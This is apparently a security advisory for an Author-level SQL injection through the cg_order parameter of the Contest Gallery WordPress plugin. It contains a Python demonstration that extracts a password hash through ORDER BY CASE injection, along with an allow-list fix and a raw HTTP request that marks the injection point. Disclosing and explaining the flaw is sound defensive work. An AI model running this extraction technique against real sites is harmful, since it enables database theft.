wpexploit / Daniel Krohmer / WPEX-ID: 857ABA7D-FCCD-4672-B734-AB228440DCC0
History: Dec 05, 2022 - 12:00 a.m.

Contest Gallery < 19.1.5 - Author+ SQL Injection

Tags: localhost, sql injection, form data, security vulnerability, wordpress, xmlhttprequest, multipart/form-data

EPSS: 0.001 (percentile 36.8%)

The plugin does not escape the cg_order POST parameter before concatenating it into an SQL query in order-custom-fields-with-and-without-search.php. Because the value lands in the query as raw SQL rather than as a bound parameter, any user with at least the Author role can supply an arbitrary SQL expression there and use it to leak sensitive information from the site's database. The request below shows the injection point; the placeholder inject-here marks where the attacker's expression goes.
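The bug class described above, modelled in Python against an in-memory SQLite database, as an added example that is not the advisory's PoC or the Contest Gallery plugin's code. It assumes the unescaped cg_order value ends up in an ORDER BY clause (suggested by the parameter name and the file name, but not stated on the page), and the table names (wp_users, cg_images), column names and sample rows are constructed for the demonstration. It shows why an unescaped ORDER BY is a full data leak even when no query output is echoed: the attacker injects a CASE expression whose sort direction depends on a condition over another table, reads the resulting row order, and recovers a password hash one character at a time. The hardened form beside it rejects everything except allow-listed column keys and directions.

```python
"""Added example: unescaped ORDER BY parameter, blind inference through row order, and an
allow-list fix. Not from the advisory or the plugin; schema, query shape and keys are assumed."""
import sqlite3
import string

# Constructed sample rows standing in for wp_users and an assumed per-image gallery table.
USERS = [(1, "admin", "$P$BsecretHashValue"), (2, "pegasus", "$P$BotherHashValue")]
IMAGES = [(1, 1, "jpg-vector-icon-png_287422"),
          (2, 1, "contest-gallery_13_step-11"),
          (3, 1, "third-image")]


def make_db():
    """In-memory SQLite stand-in for the WordPress database (schema is an assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    con.execute("CREATE TABLE cg_images (id INTEGER, cg_id INTEGER, name TEXT)")
    con.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", USERS)
    con.executemany("INSERT INTO cg_images VALUES (?, ?, ?)", IMAGES)
    return con


def vulnerable_query(con, cg_id, cg_order):
    """The flaw from the advisory: cg_order is concatenated into ORDER BY unescaped.
    cg_id is bound properly; only the ORDER BY fragment is attacker-controlled."""
    sql = "SELECT id FROM cg_images WHERE cg_id = ? ORDER BY " + cg_order
    return [row[0] for row in con.execute(sql, (cg_id,))]


def oracle(con, guess):
    """Boolean inference through row ordering: the injected CASE sorts ascending when the
    guessed prefix of the admin's password hash is right and descending otherwise.
    Nothing but the order of the returned ids is needed to read the answer."""
    literal = guess.replace("'", "''")
    payload = ("(CASE WHEN (SELECT substr(user_pass, 1, %d) FROM wp_users WHERE ID = 1) = '%s'"
               " THEN id ELSE -id END)" % (len(guess), literal))
    return vulnerable_query(con, 1, payload) == [1, 2, 3]


def extract_hash_prefix(con, length, alphabet=string.ascii_letters + string.digits + "$./"):
    """Recover the first `length` characters of the admin hash, one oracle query per guess."""
    prefix = ""
    for _ in range(length):
        for ch in alphabet:
            if oracle(con, prefix + ch):
                prefix += ch
                break
        else:
            break  # no candidate matched; stop instead of guessing further
    return prefix


# Hardened form. Identifiers cannot be bound as placeholders, so the fix is an allow-list:
# the client-chosen key selects a column from a fixed map and the direction is one of two tokens.
ORDER_COLUMNS = {"id": "id", "name": "name"}  # assumed keys; the plugin's real ones are not on the page
DIRECTIONS = {"ASC", "DESC"}


def safe_query(con, cg_id, cg_order, direction="ASC"):
    """Same query with cg_order and direction validated before they touch the SQL string."""
    column = ORDER_COLUMNS.get(cg_order)
    if column is None or direction not in DIRECTIONS:
        raise ValueError("rejected ORDER BY input: %r %r" % (cg_order, direction))
    sql = "SELECT id FROM cg_images WHERE cg_id = ? ORDER BY %s %s" % (column, direction)
    return [row[0] for row in con.execute(sql, (cg_id,))]


if __name__ == "__main__":
    db = make_db()
    print("leaked hash prefix via row order:", extract_hash_prefix(db, 4))
    try:
        safe_query(db, 1, "id, (CASE WHEN 1=1 THEN id ELSE -id END)")
    except ValueError as exc:
        print("hardened query:", exc)
```

The same CASE/ORDER BY trick works on MySQL, which is what WordPress runs on, so the model is faithful to the target even though SQLite executes it here. In a real plugin the allow-list is the right fix; WordPress also ships sanitize_sql_orderby(), which only accepts "column ASC, column2 DESC" shaped strings, but mapping the client key to a known column as above is stricter and does not depend on the column names being harmless.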

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------165946102935726109082974098673
Content-Length: 2147
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7C8d38932578430fa522ce64ed0143d8be7054cdb5b40694aecf1402276b84f91c; wp-settings-time-2=1668942221; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7Ce49a6e0384972bf193b755ee522182a7075ecf477f3c7a236f7fd32cac02e245
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgGalleryFormSubmit"

1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="action"

post_cg_gallery_view_control_backend
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgGalleryHash"

da8ea8d5d1357ad6772b3fc38178023a
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_id"

1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_start"


-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_step"

10
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_order"

cg_input_for_id_/**/inject-here/**/
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgVersionScripts"

19.1.4.1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_search"


-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_email[2]"

[email protected]
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_image_name[2]"

jpg-vector-icon-png_287422
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_email[1]"

[email protected]
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_image_name[1]"

contest-gallery_13_step-11
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="chooseAction1"

1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgBackendHash"

c5df761d52dd842d7a3b5ed58a78774d
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgIsRealFormSubmit"

true
-----------------------------165946102935726109082974098673--
